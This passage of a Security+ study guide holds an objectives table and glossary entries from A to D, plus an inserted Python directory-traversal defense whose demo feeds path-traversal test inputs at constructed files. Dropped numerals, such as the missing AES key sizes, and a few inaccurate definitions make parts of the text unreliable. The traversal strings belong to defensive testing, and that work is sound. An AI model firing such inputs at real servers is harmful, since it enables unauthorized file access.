Access control schemes Lesson , Topic C
Attribute-based access control (ABAC) Lesson , Topic C
Role-based access control Lesson , Topic C
Rule-based access control Lesson , Topic C
MAC Lesson , Topic C
Discretionary access control (DAC) Lesson , Topic C
Conditional access Lesson , Topic C
Privilege access management Lesson , Topic C
Filesystem permissions Lesson , Topic C
3.9 Given a scenario, implement public key infrastructure Lesson , Topic A
Lesson , Topic
Public key infrastructure (PKI) Lesson , Topic A
Lesson , Topic
Key management Lesson , Topic
Certificate authority (CA) Lesson , Topic A
Intermediate CA Lesson , Topic A
Registration authority (RA) Lesson , Topic A
Certificate revocation list (CRL) Lesson , Topic
Certificate attributes Lesson , Topic A
Online Certificate Status Protocol (OCSP) Lesson , Topic
Certificate signing request (CSR) Lesson , Topic A
CN Lesson , Topic A
Subject alternative name Lesson , Topic A
Expiration Lesson , Topic
Types of certificates Lesson , Topic A
Wildcard Lesson , Topic A
Subject alternative name Lesson , Topic A
Code signing Lesson , Topic A
Self-signed Lesson , Topic A
Machine/computer Lesson , Topic A
Email Lesson , Topic A
User Lesson , Topic A
Root Lesson , Topic A
Domain validation Lesson , Topic A
Extended validation Lesson , Topic A
Certificate formats Lesson , Topic
Distinguished encoding rules (DER) Lesson , Topic
Privacy enhanced mail (PEM) Lesson , Topic
Personal information exchange (PFX) Lesson , Topic
.cer Lesson , Topic
P12 Lesson , Topic
P7B Lesson , Topic
Concepts Lesson , Topic A
Lesson , Topic
Online vs. offline CA Lesson , Topic A
Stapling Lesson , Topic
Pinning Lesson , Topic
Trust model Lesson , Topic A
Key escrow Lesson , Topic
Certificate chaining Lesson , Topic A
4.0 Operations and Incident Response
4.1 Given a scenario, use the appropriate tool to assess organizational security Lesson , Topic A
Lesson , Topic
Lesson , Topic
Lesson , Topic
Lesson , Topic C
Lesson , Topic C
Lesson , Topic C
Lesson , Topic D
Lesson , Topic
Lesson , Topic
Network reconnaissance and discovery Lesson , Topic A
Lesson , Topic
tracert/traceroute Lesson , Topic A
nslookup/dig Lesson , Topic A
ipconfig/ifconfig Lesson , Topic A
nmap Lesson , Topic A
ping/pathping Lesson , Topic A
hping Lesson , Topic A
netstat Lesson , Topic A
netcat Lesson , Topic A
IP scanners Lesson , Topic A
arp Lesson , Topic A
route Lesson , Topic A
curl Lesson , Topic A
theHarvester Lesson , Topic A
sn1per Lesson , Topic A
scanless Lesson , Topic A
dnsenum Lesson , Topic A
Nessus Lesson , Topic A
Cuckoo Lesson , Topic
File manipulation Lesson , Topic C
Lesson , Topic C
head Lesson , Topic C
tail Lesson , Topic C
cat Lesson , Topic C
grep Lesson , Topic C
chmod Lesson , Topic C
logger Lesson , Topic C
Shell and script environments Lesson , Topic
Lesson , Topic C
Lesson , Topic D
SSH Lesson , Topic C
PowerShell Lesson , Topic D
Python Lesson , Topic D
OpenSSL Lesson , Topic
Packet capture and replay Lesson , Topic A
Tcpreplay Lesson , Topic A
Tcpdump Lesson , Topic A
Wireshark Lesson , Topic A
Forensics Lesson , Topic
dd Lesson , Topic
Memdump Lesson , Topic
WinHex Lesson , Topic
FTK imager Lesson , Topic
Autopsy Lesson , Topic
Exploitation frameworks Lesson , Topic A
Password crackers Lesson , Topic
Data sanitization Lesson , Topic
4.2 Summarize the importance of policies, processes, and procedures for incident response Lesson , Topic A
Incident response plans Lesson , Topic A
Incident response process Lesson , Topic A

Preparation Lesson , Topic A
Identification Lesson , Topic A
Containment Lesson , Topic A
Eradication Lesson , Topic A
Recovery Lesson , Topic A
Lessons learned Lesson , Topic A
Exercises Lesson , Topic A
Tabletop Lesson , Topic A
Walkthroughs Lesson , Topic A
Simulations Lesson , Topic A
Attack frameworks Lesson , Topic A
MITRE ATT&CK Lesson , Topic A
The Diamond Model of Intrusion Analysis Lesson , Topic A
Cyber Kill Chain Lesson , Topic A
Stakeholder management Lesson , Topic A
Communication plan Lesson , Topic A
Disaster recovery plan Lesson , Topic A
Business continuity plan Lesson , Topic A
Continuity of operations planning (COOP) Lesson , Topic A
Incident response team Lesson , Topic A
Retention policies Lesson , Topic A
Given an incident, utilize appropriate data sources to Lesson , Topic
support an investigation
Vulnerability scan output Lesson , Topic
SIEM dashboards Lesson , Topic
Sensor Lesson , Topic
Sensitivity Lesson , Topic
Trends Lesson , Topic
Alerts Lesson , Topic
Correlation Lesson , Topic
Log files Lesson , Topic
Network Lesson , Topic
System Lesson , Topic
Application Lesson , Topic
Security Lesson , Topic
Web Lesson , Topic
DNS Lesson , Topic
Authentication Lesson , Topic
Dump files Lesson , Topic
VoIP and call managers Lesson , Topic
Session Initiation Protocol (SIP) traffic Lesson , Topic

syslog/rsyslog/syslog-ng Lesson , Topic
journalctl Lesson , Topic
NXLog Lesson , Topic
Bandwidth monitors Lesson , Topic
Metadata Lesson , Topic
Email Lesson , Topic
Mobile Lesson , Topic
Web Lesson , Topic
File Lesson , Topic
NetFlow/sFlow Lesson , Topic
NetFlow Lesson , Topic
sFlow Lesson , Topic
IPFIX Lesson , Topic
Protocol analyzer output Lesson , Topic
Given an incident, apply mitigation techniques or Lesson , Topic C
controls to secure an environment
Reconfigure endpoint security solutions Lesson , Topic C
Application approved list Lesson , Topic C
Application block list/deny list Lesson , Topic C
Quarantine Lesson , Topic C
Configuration changes Lesson , Topic C
Firewall rules Lesson , Topic C
MDM Lesson , Topic C
DLP Lesson , Topic C
Content filter/URL filter Lesson , Topic C
Update or revoke certificates Lesson , Topic C
Isolation Lesson , Topic C
Containment Lesson , Topic C
Segmentation Lesson , Topic C
SOAR Lesson , Topic C
Runbooks Lesson , Topic C
Playbooks Lesson , Topic C
Explain the key aspects of digital forensics Lesson , Topic A
Lesson , Topic
Documentation/evidence Lesson , Topic A
Legal hold Lesson , Topic A
Video Lesson , Topic A
Admissibility Lesson , Topic A
Chain of custody Lesson , Topic A
Timelines of sequence of events Lesson , Topic A
Time stamps Lesson , Topic A
Time offset Lesson , Topic A

Tags Lesson , Topic A
Reports Lesson , Topic A
Event logs Lesson , Topic A
Interviews Lesson , Topic A
Acquisition Lesson , Topic
Order of volatility Lesson , Topic
Disk Lesson , Topic
Random-access memory (RAM) Lesson , Topic
Swap/pagefile Lesson , Topic
Lesson , Topic
Device Lesson , Topic
Firmware Lesson , Topic
Snapshot Lesson , Topic
Cache Lesson , Topic
Network Lesson , Topic
Artifacts Lesson , Topic
On-premises vs. cloud Lesson , Topic
Right-to-audit clauses Lesson , Topic
Regulatory/jurisdiction Lesson , Topic
Data breach notification laws Lesson , Topic
Integrity Lesson , Topic
Hashing Lesson , Topic
Checksums Lesson , Topic
Provenance Lesson , Topic
Preservation Lesson , Topic
E-discovery Lesson , Topic A
Data recovery Lesson , Topic
Non-repudiation Lesson , Topic
Strategic intelligence/counterintelligence Lesson , Topic A
5.0 Governance, Risk, and Compliance
Compare and contrast various types of controls Lesson , Topic
Category Lesson , Topic
Managerial Lesson , Topic
Operational Lesson , Topic
Technical Lesson , Topic
Control type Lesson , Topic
Preventative Lesson , Topic
Detective Lesson , Topic
Corrective Lesson , Topic
Deterrent Lesson , Topic
Compensating Lesson , Topic
Physical Lesson , Topic

Explain the importance of applicable regulations, Lesson , Topic
standards, or frameworks that impact organizational
security posture
Regulations, standards, and legislation Lesson , Topic
General Data Protection Regulation (GDPR) Lesson , Topic
National, territory, or state laws Lesson , Topic
Payment Card Industry Data Security Standard (PCI DSS) Lesson , Topic
Key frameworks Lesson , Topic
Center for Internet Security (CIS) Lesson , Topic
National Institute of Standards and Technology (NIST) RMF/CSF Lesson , Topic
International Organization for Standardization (ISO) Lesson , Topic
SSAE SOC 2 Type I/II Lesson , Topic
Cloud security alliance Lesson , Topic
Cloud control matrix Lesson , Topic
Reference architecture Lesson , Topic
Benchmarks/secure configuration guides Lesson , Topic
Platform/vendor-specific guides Lesson , Topic
Web server Lesson , Topic
Lesson , Topic
Application server Lesson , Topic
Network infrastructure devices Lesson , Topic
Explain the importance of policies to organizational Lesson , Topic A
security Lesson , Topic D
Lesson , Topic A
Lesson , Topic A
Lesson , Topic C
Personnel Lesson , Topic A
Lesson , Topic D
Acceptable use policy Lesson , Topic D
Job rotation Lesson , Topic A
Mandatory vacation Lesson , Topic A
Separation of duties Lesson , Topic A
Least privilege Lesson , Topic A
Clean desk space Lesson , Topic D
Background checks Lesson , Topic A
Non-disclosure agreement (NDA) Lesson , Topic A
Social media analysis Lesson , Topic D
Onboarding Lesson , Topic A
Offboarding Lesson , Topic A
User training Lesson , Topic D
Gamification Lesson , Topic D

Capture the flag Lesson , Topic D
Phishing campaigns Lesson , Topic D
Phishing simulations Lesson , Topic D
Computer-based training (CBT) Lesson , Topic D
Role-based training Lesson , Topic D
Diversity of training techniques Lesson , Topic D
Third-party risk management Lesson , Topic A
Vendors Lesson , Topic A
Supply chain Lesson , Topic A
Business partners Lesson , Topic A
Service level agreement (SLA) Lesson , Topic A
Memorandum of understanding (MOU) Lesson , Topic A
Master services agreement (MSA) Lesson , Topic A
Business partnership agreement (BPA) Lesson , Topic A
End of life (EOL) Lesson , Topic A
End of service life (EOSL) Lesson , Topic A
NDA Lesson , Topic A
Data Lesson , Topic A
Classification Lesson , Topic A
Governance Lesson , Topic A
Retention Lesson , Topic A
Credential policies Lesson , Topic A
Personnel Lesson , Topic A
Third-party Lesson , Topic A
Devices Lesson , Topic A
Service accounts Lesson , Topic A
Administrator/root accounts Lesson , Topic A
Organizational policies Lesson , Topic C
Change management Lesson , Topic C
Change control Lesson , Topic C
Asset management Lesson , Topic C
Summarize risk management processes and concepts Lesson , Topic A
Lesson , Topic
Risk types Lesson , Topic A
External Lesson , Topic A
Internal Lesson , Topic A
Legacy systems Lesson , Topic A
Multiparty Lesson , Topic A
IP theft Lesson , Topic A
Software compliance/licensing Lesson , Topic A
Risk management strategies Lesson , Topic A

Acceptance Lesson , Topic A
Avoidance Lesson , Topic A
Transference Lesson , Topic A
Cybersecurity insurance Lesson , Topic A
Mitigation Lesson , Topic A
Risk analysis Lesson , Topic A
Risk register Lesson , Topic A
Risk matrix/heat map Lesson , Topic A
Risk control assessment Lesson , Topic A
Risk control self-assessment Lesson , Topic A
Risk awareness Lesson , Topic A
Inherent risk Lesson , Topic A
Residual risk Lesson , Topic A
Control risk Lesson , Topic A
Risk appetite Lesson , Topic A
Regulations that affect risk posture Lesson , Topic A
Risk assessment types Lesson , Topic A
Qualitative Lesson , Topic A
Quantitative Lesson , Topic A
Likelihood of occurrence Lesson , Topic A
Impact Lesson , Topic A
Asset value Lesson , Topic A
Single loss expectancy (SLE) Lesson , Topic A
Annualized loss expectancy (ALE) Lesson , Topic A
Annualized rate of occurrence (ARO) Lesson , Topic A
Disasters Lesson , Topic
Environmental Lesson , Topic
Person-made Lesson , Topic
Internal vs. external Lesson , Topic
Business impact analysis Lesson , Topic
Recovery time objective (RTO) Lesson , Topic
Recovery point objective (RPO) Lesson , Topic
Mean time to repair (MTTR) Lesson , Topic
Mean time between failures (MTBF) Lesson , Topic
Functional recovery plans Lesson , Topic
Single point of failure Lesson , Topic
Disaster recovery plan (DRP) Lesson , Topic
Mission essential functions Lesson , Topic
Identification of critical systems Lesson , Topic
Site risk assessment Lesson , Topic

Explain privacy and sensitive data concepts in relation Lesson , Topic A
to security Lesson , Topic
Organizational consequences of privacy and data breaches Lesson , Topic A
Reputation damage Lesson , Topic A
Identity theft Lesson , Topic A
Fines Lesson , Topic A
IP theft Lesson , Topic A
Notifications of breaches Lesson , Topic A
Escalation Lesson , Topic A
Public notifications and disclosures Lesson , Topic A
Data types Lesson , Topic A
Classifications Lesson , Topic A
Public Lesson , Topic A
Private Lesson , Topic A
Sensitive Lesson , Topic A
Confidential Lesson , Topic A
Critical Lesson , Topic A
Proprietary Lesson , Topic A
Personally identifiable information (PII) Lesson , Topic A
Health information Lesson , Topic A
Financial information Lesson , Topic A
Government data Lesson , Topic A
Customer data Lesson , Topic A
Privacy enhancing technologies Lesson , Topic
Data minimization Lesson , Topic
Data masking Lesson , Topic
Tokenization Lesson , Topic
Anonymization Lesson , Topic
Pseudo-anonymization Lesson , Topic
Roles and responsibilities Lesson , Topic A
Data owners Lesson , Topic A
Data controller Lesson , Topic A
Data processor Lesson , Topic A
Data custodian/steward Lesson , Topic A
Data protection officer (DPO) Lesson , Topic A
Information life cycle Lesson , Topic A
Impact assessment Lesson , Topic A
Terms of agreement Lesson , Topic A
Privacy notice Lesson , Topic A

Glossary
AAA (authentication, authorization, and accounting) A security concept where a centralized platform verifies subject identification, ensures the subject is assigned relevant permissions, and then logs these actions to create an audit trail.

ABAC (attribute-based access control) An access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted.

account policies A set of rules governing user security information, such as password expiration and uniqueness, which can be set globally.

ACL (Access Control List) A collection of access control entries (ACEs) that determines which subjects (user accounts, host IP addresses, and so on) are allowed or denied access to the object and the privileges given (read-only, read/write, and so on).

active defense The practice of responding to a threat by destroying or deceiving a threat actor's capabilities.

adversarial AI (adversarial artificial intelligence) Using AI to identify vulnerabilities and attack vectors to circumvent security systems.

AES (Advanced Encryption Standard) A symmetric , , or bit block cipher based on the Rijndael algorithm developed by Belgian cryptographers Joan Daemen and Vincent Rijmen and adopted by the U.S. government as its encryption standard to replace DES.

Agile model (Agile) A software development model that focuses on iterative and incremental development to account for evolving requirements and expectations.

AH (authentication header) An IPSec protocol that provides authentication for the origin of transmitted data as well as integrity and protection against replay attacks.

air gap A type of network isolation that physically separates a network from all other networks.

AIS (Automated Indicator Sharing) Threat intelligence data feed operated by the DHS.

ALE (annual loss expectancy) The total cost of a risk to an organization on an annual basis. This is determined by multiplying the SLE by the annual rate of occurrence (ARO).

AP (access point) A device that provides a connection between wireless devices and can connect to wired networks. Also known as wireless access point or WAP.

API (application programming interface) A library of programming utilities used, for example, to enable software developers to access functions of the TCP/IP network stack under a particular operating system.

application-aware firewall A Layer 7 firewall technology that inspects packets at the Application layer of the OSI model.

application firewall Software designed to run on a server to protect a particular application such as a web server or SQL server.

APT (advanced persistent threat) An attacker's ability to obtain, maintain, and diversify access to network systems using exploits and malware.

Arduino Open-source platform producing programmable circuit boards for education and industrial prototyping.

ARO (annual rate of occurrence) In risk calculation, an expression of the probability/likelihood of a risk as the number of times per year a particular loss is expected to occur.

ARP inspection An optional security feature of a switch that prevents excessive ARP replies from flooding a network segment.

ARP poisoning (ARP spoofing) A network-based attack where an attacker with access to the target local network segment redirects an IP address to the MAC address of a computer that is not the intended recipient. This can be used to perform a variety of attacks, including DoS, spoofing, and Man-in-the-Middle.

asymmetric algorithm (Public Key) A cipher that uses public and private keys. The keys are mathematically linked, using either Rivest, Shamir, Adleman (RSA) or elliptic curve cryptography (ECC) algorithms, but the private key is not derivable from the public one. An asymmetric key cannot reverse the operation it performs, so the public key cannot decrypt what it has encrypted, for example. Also known as Elliptic Curve Cryptography or ECC.

ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) A knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and procedures.

attack surface The points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor.

attack vector A specific path by which a threat actor gains unauthorized access to a system. Also known as vector.

authenticator A PNAC switch or router that activates EAPoL and passes a supplicant's authentication data to an authenticating server, such as a RADIUS server.

automation Using scripts and APIs to provision and deprovision systems without manual intervention.

Autopsy The Sleuth Kit is an open source collection of command line and programming libraries for disk imaging and file analysis. Autopsy is a graphical frontend for these tools and also provides a case management workflow tool. Also known as Sleuth Kit.

availability The fundamental security goal of ensuring that computer systems operate continuously and that authorized persons can access data that they need.

BAS (building automation system) Components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers.

baseband radio The chip and firmware in a smartphone that acts as a cellular modem.

baseline configuration A collection of security and configuration settings that are to be applied to a particular system or network in the organization.

bash (Bourne again shell) A command shell and scripting language for Unix-like systems.

bastion host A server typically found in a DMZ that is configured to provide a single service to reduce the possibility of compromise.

behavioral analysis A network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences. Also known as behavior-based detection.

BIA (business impact analysis) A systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations.

birthday attack A type of password attack that exploits weaknesses in the mathematical algorithms used to encrypt passwords, in order to take advantage of the probability of different password inputs producing the same encrypted output.

block cipher A type of symmetric encryption that encrypts data one block at a time, often in bit blocks. It is usually more secure, but is also slower, than stream ciphers.

blockchain A concept in which an expanding list of transactional records listed in a public ledger is secured using cryptography.

blue team The defensive team in a penetration test or incident response exercise.

bluejacking Sending an unsolicited message or picture message using a Bluetooth connection.

bluesnarfing A wireless attack where an attacker gains access to unauthorized information on a device using a Bluetooth connection.

boot attestation Report of boot state integrity data that is signed by a tamper-proof TPM key and reported to a network server.

botnet A set of hosts that has been infected by a control program called a bot that enables attackers to exploit the hosts to mount attacks. Also known as zombie.

BPA (business partnership agreement) Agreement by two companies to work together closely, such as the partner agreements that large IT companies set up with resellers and solution providers.

BPDU guard (Bridge Protocol Data Unit guard) Switch port security feature that disables the port if it receives BPDU notifications related to spanning tree. This is configured on access ports where any BPDU frames are likely to be malicious.

brute force attack A type of password attack where an attacker uses an application to exhaustively try every possible alphanumeric combination to crack encrypted passwords.

buffer overflow An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code.

bug bounty Reward scheme operated by software and web services vendors for reporting vulnerabilities.

BYOD (bring your own device) Security framework and tools to facilitate use of personally-owned devices to access corporate networks and data.

C&C (command and control) An infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets. Also known as C2.

CA (certificate authority) A server that guarantees subject identities by issuing signed digital certificate wrappers for their public keys.

cable lock Devices can be physically secured against theft using cable ties and padlocks. Some systems also feature lockable faceplates, preventing access to the power switch and removable drives.

CAC (common access card) A smart card that provides certificate-based authentication and supports two-factor authentication. A CAC is produced for Department of Defense employees and contractors in response to a Homeland Security Directive.

CAN bus (controller area network bus) A serial network designed to allow communications between embedded programmable logic controllers.

CAPTCHA (completely automated public turing test to tell computers and humans apart) An image of text characters or audio of some speech that is difficult for a computer to interpret. CAPTCHAs are used for purposes such as preventing bots from creating accounts on web forums and social media sites to spam them.

captive portal A web page or website to which a client is redirected before being granted full network access.

capture the flag Training event where learners must identify a token within a live network environment.

card cloning/skimming Duplicating a smart card by reading (skimming) the confidential data stored on it. Also known as skimming.

carving The process of extracting data from a computer when that data has no associated file system metadata.

CASB (cloud access security broker) Enterprise management software designed to mediate access to cloud services by users across all types of devices.

cat command Linux command to view and combine (concatenate) files.

CBC (cipher block chaining) An encryption mode of operation where an exclusive or is applied to the first plaintext block

CCMP (counter mode with cipher block chaining message authentication code protocol) An encryption protocol used for wireless LANs that addresses the vulnerabilities of the WEP protocol.

CE (cryptographic erase) A method of sanitizing a self-encrypting drive by erasing the media encryption key.

chain of custody The record of evidence history from collection, to presentation in court, to disposal.

change control The process by which the need for change is recorded and approved.

change management The process through which changes to the configuration of information systems are implemented, as part of the organization's overall configuration management efforts.

CHAP (Challenge Handshake Authentication Protocol) Authentication scheme developed for dial-up networks that uses an encrypted three-way handshake to authenticate the client to the server. The challenge-response is repeated throughout the connection (though transparently to the user) to guard against replay attacks.

checksum The output of a hash function.

chmod Linux command for managing file permissions.

CIA triad (confidentiality, integrity, and availability) The three principles of security control and management. Also known as the information security triad or AIC triad.

circuit-level stateful inspection firewall A Layer firewall technology that tracks the active state of a connection, and can make decisions based on the contents of network traffic as it relates to the state of the connection.

CIS (Center for Internet Security) A not-for-profit organization (founded partly by SANS). It publishes the well-known "Top 20 Critical Security Controls" (or system design recommendations).

clean desk policy An organizational policy that mandates employee work areas be free from potentially sensitive information; sensitive documents must not be left out where unauthorized personnel might see them.

cloud deployment model Classifying the ownership and management of a cloud as public, private, community, or hybrid.

Cloud Security Alliance Industry body providing security guidance to CSPs, including enterprise reference architecture and security controls matrix.

cloud service model Classifying the provision of cloud services and the limit of the cloud service provider's responsibility as software, platform, infrastructure, and so on.

clustering A load balancing technique where a group of servers are configured as a unit and work together to provide network services.

CN (common name) An attribute expressing a host or user name, also used as the subject identifier for a digital certificate.

COBO (corporate owned, business only) Enterprise mobile device provisioning model where the device is the property of the organization and personal use is prohibited.

code of conduct Professional behavior depends on basic ethical standards, such as honesty and fairness. Some professions may have developed codes of ethics to cover difficult situations; some businesses may also have a code of ethics to communicate the values it expects its employees to practice. Also known as ethics.

code reuse Potentially unsecure programming practice of using code originally written for a different context.

code signing The method of using a digital signature to ensure the source and integrity of programming code.

cold site A predetermined alternate location where a network can be rebuilt after a disaster.

collector A network appliance that gathers or receives log and/or state data from other network systems.

collision In cryptography, the act of two different plaintext inputs producing the same exact ciphertext output.

community cloud A cloud that is deployed for shared use by cooperating tenants.

compensating control A security measure that takes on risk mitigation when a primary control fails or cannot completely meet expectations.

confidentiality The fundamental security goal of keeping information and communications private and protecting them from unauthorized access.

containerization A type of virtualization applied by a host operating system to provision an isolated execution environment for an application.

content filter A software application or gateway that filters client requests for various types of internet content (web, FTP, IM, and so on).

context-aware authentication An access control scheme that verifies an object's identity based on various environmental factors, like time, location, and behavior.

continuous delivery Software development method in which app and platform requirements are frequently tested and validated for immediate availability.

continuous deployment Software development method in which app and platform updates are committed to production rapidly.

continuous integration Software development method in which code updates are tested and committed to a development or build server/code repository rapidly.

continuous monitoring The technique of constantly evaluating an environment for changes so that new risks may be more quickly detected and business operations improved upon. Also known as continuous security monitoring or CSM.

control risk Risk that arises when a control does not provide the level of mitigation that was expected.

COPE (corporate owned, personally enabled) Enterprise mobile device provisioning model where the device remains the property of the organization, but certain personal use, such as private email, social networking, and web browsing, is permitted.

corrective control A type of security control that acts after an incident to eliminate or minimize its impact.

correlation Function of log analysis that links log and state data to identify a pattern that should be logged or alerted as an event.

counter mode (CTM) An encryption mode of operation where a numerical counter value is used to create a constantly changing IV. Also referred to as CTM (counter mode) and CM (counter mode).

credential stuffing Brute force attack in which stolen user account names and passwords are tested against multiple websites.

CRL (certificate revocation list) A list of certificates that were revoked before their expiration date.

crossover error rate Biometric evaluation factor expressing the point at which FAR and FRR meet, with a low value indicating better performance.

CSP (cloud service provider) A vendor offering public cloud service models, such as PaaS, IaaS, or SaaS.

CSR (certificate signing request) A Base64 ASCII file that a subject sends to a CA to get a certificate.

CTI (cyber threat intelligence) The process of investigating, collecting, analyzing, and disseminating information about emerging threats and threat sources. Also known as threat intelligence.

Cuckoo Implementation of a sandbox for malware analysis.

curl command Utility for command-line manipulation of URL-based protocol requests.

CVE (Common Vulnerabilities and Exposures) Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST.

CVSS (Common Vulnerability Scoring System) A risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information.

CYOD (choose your own device) Enterprise mobile device provisioning model where employees are offered a selection of corporate devices for work and, optionally, private use.

DAC (discretionary access control) Access control model where each resource is protected by an Access Control List (ACL) managed by the resource's owner (or owners).

data at rest Information that is primarily stored on specific media, rather than moving from one medium to another.

data breach When confidential or private data is read, copied, or changed without authorization. Data breach events may have notification and reporting requirements.

data controller In privacy regulations, the entity that determines why and how personal data is collected, stored, and used.

data custodian An individual who is responsible for managing the system on which data assets are stored, including being responsible for enforcing access control, encryption, and backup/recovery measures.

data exfiltration The process by which an attacker takes data that is stored inside of a private network and moves it to an external network.

data exposure A software vulnerability where an attacker is able to circumvent access controls and retrieve confidential or sensitive data from the file system or database.

data governance The overall management of the availability, usability, and security of the information used in an organization.

data in processing Information that is present in the volatile memory of a host, such as system memory or cache.

data in transit Information that is being transmitted between two hosts, such as over a private network or the Internet. Also known as data in motion.

data masking A deidentification method where generic or placeholder labels are substituted for real data while preserving the structure or format of the original data.

data minimization In data protection, the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose.

data owner A senior (executive) role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of an information asset.

data processor In privacy regulations, an entity trusted with a copy of personal data to perform storage and/or analysis on behalf of the data collector.

data remnant Leftover information on a storage medium even after basic attempts have been made to remove that data. Also known as remnant.

data sovereignty In data protection, the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction.

data steward An individual who is primarily responsible for data quality, ensuring data is labeled and identified with appropriate metadata and that data is collected and stored in a format and with values that comply with applicable laws and regulations.

DHCP snooping A configuration option that enables a switch to inspect DHCP traffic to prevent MAC spoofing.

dd command Linux command that makes a bit-by-bit copy of an input file, typically used for disk imaging.

DDoS attack (distributed denial of service attack) An attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic.

dead code Code in an application that is redundant because it will never be called within the logic of the program flow.

deauthentication/disassociation Spoofing frames to disconnect a wireless station to try to obtain authentication data to crack.

deception and disruption Cybersecurity resilience tools and techniques to increase the cost of attack planning for the threat actor.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-7

default account Default administrative and guest accounts configured on servers and network devices are possible points of unauthorized access.

defense in depth A security strategy that positions the layers of network security as network traffic roadblocks; each layer is intended to slow an attack's progress, rather than eliminating it outright.

degaussing The process of rendering a storage drive inoperable and its data unrecoverable by eliminating the drive's magnetic charge.

deidentification In data protection, methods and technologies that remove identifying information from data before it is distributed.

deprovisioning The process of removing an application from packages or instances.

DER (distinguished encoding rules) The binary format used to structure the information in a digital certificate.

detective control A type of security control that acts during an incident to identify or record that it is happening.

deterrent control A type of security control that discourages intrusion attempts.

Diffie-Hellman A cryptographic technique that provides secure key exchange.

DHCP spoofing (Dynamic Host Configuration Protocol spoofing) An attack in which an attacker responds to a client requesting address assignment from a DHCP server.

Diamond Model A framework for analyzing cybersecurity incidents.

dictionary attack A type of password attack that compares encrypted passwords against a predetermined list of possible password values.

differential backup A backup type in which all selected files that have changed since the last full backup are backed up.

DiffServ The Differentiated Services Code Point (DSCP) field is used to indicate a priority value for a layer 3 (IP) packet to facilitate Quality of Service (QoS) or Class of Service (CoS) scheduling.

digital signature A message digest encrypted using the sender's private key that is appended to a message to authenticate the sender and prove message integrity.

directory service A network service that stores identity information about all the objects in a particular network, including users, groups, servers, client computers, and printers.

directory traversal An application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory.

diversity Cybersecurity resilience strategy that increases attack costs by provisioning multiple types of controls, technologies, vendors, and crypto implementations.

DLP (data loss/leak prevention) A software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.

DMZ (demilitarized zone) A segment isolated from the rest of a private network by one or more firewalls that accepts connections from the Internet over designated ports.

DNAT (destination network address translation) NAT service where private internal addresses are mapped to one or more public addresses to facilitate Internet connectivity for hosts on a local network via a router.

DNS hijacking (Domain Name System hijacking) An attack in which an attacker modifies a computer's DNS configurations to point to a malicious DNS server.

DNS poisoning (Domain Name System poisoning) A network-based attack where an attacker exploits the traditionally open nature of the DNS system to redirect a domain name to an IP address of the attacker's choosing.

DNSSEC (Domain Name System Security Extensions) A security protocol that provides authentication of DNS data and upholds DNS data integrity.
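As an added example (not code from the CompTIA guide or from any product it names), the check a web application can apply against the directory traversal attack defined above; it is the same containment test that the input validation and insecure object reference entries later in this glossary call for. The requested name is percent-decoded once, treated as relative to the document root, fully resolved so that `..` segments and symbolic links are normalized, and served only if the result is still inside the root. The document root, its files and the escaping symlink are constructed in a temporary directory purely for the demonstration.

```python
import tempfile
from pathlib import Path
from typing import Dict, Optional
from urllib.parse import unquote


def safe_resolve(document_root: str, requested: str) -> Optional[Path]:
    """Map a user-supplied name onto a file under document_root.

    Returns the absolute path if it lies inside the root, else None.
    The request is percent-decoded once so that an encoded '..' cannot
    slip past the check, treated as relative even if it begins with a
    slash, and fully resolved so that '..' segments and symbolic links
    are normalized before the containment test is made.
    """
    root = Path(document_root).resolve()
    name = unquote(requested)
    if "%" in name:
        return None  # still encoded after one decode: reject, do not guess
    candidate = (root / name.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        return None  # escaped the root via '..' or a symlink
    return candidate


def demo() -> Dict[str, bool]:
    """Build a constructed document root in a temp dir and test requests.

    Layout (all constructed for this example):
        base/secret.txt        outside the root, must never be served
        base/www/index.html    inside the root
        base/www/link.txt      symlink pointing out to base/secret.txt
    Returns request -> True if it would be served, False if rejected.
    """
    base = Path(tempfile.mkdtemp())
    root = base / "www"
    root.mkdir()
    (root / "index.html").write_text("<h1>constructed page</h1>")
    (base / "secret.txt").write_text("constructed secret")
    requests = ["index.html", "sub/../index.html", "/index.html",
                "../secret.txt", "/../secret.txt", "%2e%2e/secret.txt",
                "%252e%252e/secret.txt"]
    try:
        (root / "link.txt").symlink_to(base / "secret.txt")
        requests.append("link.txt")
    except OSError:
        pass  # symlink creation not permitted on this host; skip that case
    return {r: safe_resolve(str(root), r) is not None for r in requests}


if __name__ == "__main__":
    for req, allowed in demo().items():
        print(f"{'serve ' if allowed else 'reject'} {req}")
```

The decode-then-resolve order matters: checking for `..` in the raw string would miss `%2e%2e`, and checking before resolving would miss a symlink that points outside the root. A name that still contains `%` after one decode is rejected outright rather than decoded again, because repeated decoding is what double-encoding attacks rely on.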

domain hijacking A type of hijacking attack where the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Sometimes referred to as brandjacking.

DoS attack (denial of service attack) Any type of physical, application, or network attack that affects the availability of a managed resource.

downgrade attack A cryptographic attack where the attacker exploits the need for backward compatibility to force a computer system to abandon the use of encrypted messages in favor of plaintext messages.

data privacy officer Institutional data governance role with responsibility for compliant collection and processing of personal and sensitive data.

DRP (disaster recovery plan) A documented and resourced plan showing actions and responsibilities to be used in response to critical incidents.

DSA (Digital Signature Algorithm) Public key encryption standard used for digital signatures that provides authentication and integrity verification for messages.

dump file File containing data captured from system memory.

dumpster diving (Dumpster) The social engineering technique of discovering things about an organization (or person) based on what it throws away.

